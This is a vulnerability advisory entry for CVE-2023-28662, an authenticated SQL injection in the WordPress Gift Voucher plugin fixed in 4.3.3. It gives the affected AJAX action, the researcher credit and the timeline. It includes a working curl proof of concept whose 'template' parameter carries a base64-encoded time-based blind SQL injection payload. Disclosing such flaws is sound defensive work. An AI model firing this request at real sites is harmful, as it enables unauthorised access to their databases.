Gift Voucher < 4.3.3 – Subscriber+ SQLi | CVE 2023-28662 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape the template parameter before using it in a SQL statement via the wpgv_doajax_voucher_pdf_save_func AJAX action, leading to a SQL injection exploitable by any authenticated users, such as subscriber

Proof of Concept

curl "http://$TARGET_HOST/wp-admin/admin-ajax.php" --data "action=wpgv_doajax_voucher_pdf_save_func&nonce=af77cd5581&template=KENBU0UgV0hFTiAoMTAxNj0xMDE2KSBUSEVOIFNMRUVQKDUpIEVMU0UgMTAxNiBFTkQp&buying_for=&for=&from=&value=&message=&code=&shipping=&shipping_email=&firstname=&lastname=&email=&address=&pincode=&shipping_method=&paymentmethod="

Affects Plugins

Fixed in 4.3.3

References

CVE

URL

https://www.tenable.com/security/research/tra-2023-2

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Joshua Martinelle (Tenable Research)

Verified

No

WPVDB ID

7ad59661-b43c-42fc-8575-4039312ab0b3

Timeline

Publicly Published

2023-03-22 (about 2 years ago)

Added

2023-03-23 (about 2 years ago)

Last Updated

2023-06-29 (about 2 years ago)

Other

Published

Title

Published

2015-07-10

Title

CP Multi View Event Calendar <= 1.1.7 - Unauthenticated SQL Injection

Published

2014-08-01

Title

Wordpress 2.2 - XML-RPC SQL Injection

Published

2025-05-07

Title

PDF Invoices for WooCommerce + Drag and Drop Template Builder < 5.4.0 - Authenticated (Administrator+) SQL Injection

Published

2014-08-01

Title

GRAND Flash Album Gallery 0.55 - lib/hitcounter.php pid Parameter SQL Injection

Published

2024-10-31

Title

WP EIS <= 1.3.3 - Authenticated (Contributor+) SQL Injection